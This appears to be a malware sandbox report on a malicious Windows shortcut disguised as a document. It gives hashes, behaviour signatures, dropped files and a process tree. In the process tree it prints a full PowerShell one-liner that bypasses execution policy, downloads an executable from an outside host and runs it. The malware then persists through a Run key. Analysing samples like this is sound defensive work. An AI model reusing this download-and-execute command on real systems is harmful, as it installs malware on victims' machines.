Overview

overview

10

Static

static

1

Document_4...oc.lnk

windows7-x64

10

Document_4...oc.lnk

windows10-2004-x64

10

Resubmissions

29/08/2023, 12:14

230829-pellfafd41 10

28/08/2023, 06:52

230828-hneqxsaf5t 10

28/08/2023, 01:20

230828-bp4ywaed58 10

Analysis

  • max time kernel
    158s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    28/08/2023, 06:52

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Document_45/Document_45.doc.lnk

  • Size

    1KB

  • MD5

    c7eb920f5717b5911ca1565067a5a314

  • SHA1

    aad1960e04ce48f707fe297e17eeb0cbe2ddbb83

  • SHA256

    b3dac534d0ce19efdf1aa37718283318e94a82446b3fad721076bb63f427eee3

  • SHA512

    5baab10dfe542581f4ec2e38fd5481c2d6d69192c6775de5e2326e73b3547d46a61608fae55082f184ef1c5d613358bfcca067c18514668d9842e95be6d7533b

Score
10/10
persistence

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://twizt.net/s.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Document_45\Document_45.doc.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/s.exe','C:\Users\Admin\windrv.exe');Start-Process 'C:\Users\Admin\windrv.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/s.exe','C:\Users\Admin\windrv.exe');Start-Process 'C:\Users\Admin\windrv.exe'
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Users\Admin\windrv.exe
          "C:\Users\Admin\windrv.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\winsvc.exe
            C:\Windows\winsvc.exe
            5⤵
            • Executes dropped EXE
            PID:620

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ETC1A4RJ.txt
          Filesize

          216B

          MD5

          83fef87e909f90e1e7d5b56ebccc2957

          SHA1

          656d634b48434d8e523fa7705a92dcaa561d9763

          SHA256

          81c1d8b377d6a9c1bcbf94231081707afb86aaa776433f2242203121bb1e15ff

          SHA512

          d76d0b75f7cd9a4aec14dce6cf9e606139f3810dbdaa4d9a1ae297ec43b69e3ab0595ed6a66e56c7f99c76e380bd7496e0861285489f94dfc34a630bc5a82e0b

          Download Submit

        • C:\Users\Admin\windrv.exe
          Filesize

          17KB

          MD5

          eee0836b7e86e19c5d090c23b7014282

          SHA1

          7decf13272c0759c905aebcf8c077b905ec277c3

          SHA256

          eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc

          SHA512

          c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05

          Download Submit

        • C:\Users\Admin\windrv.exe
          Filesize

          17KB

          MD5

          eee0836b7e86e19c5d090c23b7014282

          SHA1

          7decf13272c0759c905aebcf8c077b905ec277c3

          SHA256

          eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc

          SHA512

          c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05

          Download Submit

        • C:\Windows\winsvc.exe
          Filesize

          17KB

          MD5

          eee0836b7e86e19c5d090c23b7014282

          SHA1

          7decf13272c0759c905aebcf8c077b905ec277c3

          SHA256

          eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc

          SHA512

          c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05

          Download Submit

        • C:\Windows\winsvc.exe
          Filesize

          17KB

          MD5

          eee0836b7e86e19c5d090c23b7014282

          SHA1

          7decf13272c0759c905aebcf8c077b905ec277c3

          SHA256

          eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc

          SHA512

          c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05

          Download Submit

        • memory/2872-46-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2872-40-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2872-47-0x00000000026F0000-0x0000000002770000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2872-45-0x00000000026F0000-0x0000000002770000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2872-53-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2872-54-0x00000000026F0000-0x0000000002770000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2872-44-0x00000000026F0000-0x0000000002770000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2872-42-0x0000000002290000-0x0000000002298000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2872-43-0x00000000026F0000-0x0000000002770000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2872-41-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

          Filesize

          9.6MB

          Download